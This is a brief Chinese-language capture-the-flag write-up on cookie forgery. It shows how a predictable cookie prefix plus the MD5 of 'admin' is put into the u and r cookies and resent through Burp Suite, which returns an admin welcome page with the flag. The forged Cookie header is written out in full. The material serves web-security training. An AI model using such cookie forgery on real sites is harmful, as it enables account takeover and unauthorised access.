web安全之cookie伪造
我们注册一个用户登陆上
Cookie都是351e766803开头
我们猜把351e766803后面的值改成admin的md5值
351e766803 21232f297a57a5a743894a0e4a801fc3
修改完cookie
bs抓包改,发送
Cookie: session=6c1752d5-ddbf-4d04-9f2a-2c9de2b795bf;
PHPSESSID=ubcb0jjgv6m6nrvs38re4jjji1;
u=351e76680321232f297a57a5a743894a0e4a801fc3;
r=351e76680321232f297a57a5a743894a0e4a801fc3
得到flag<h1>Welcome admin user!</h1><h3>The flag is: 动态flag</h3></body>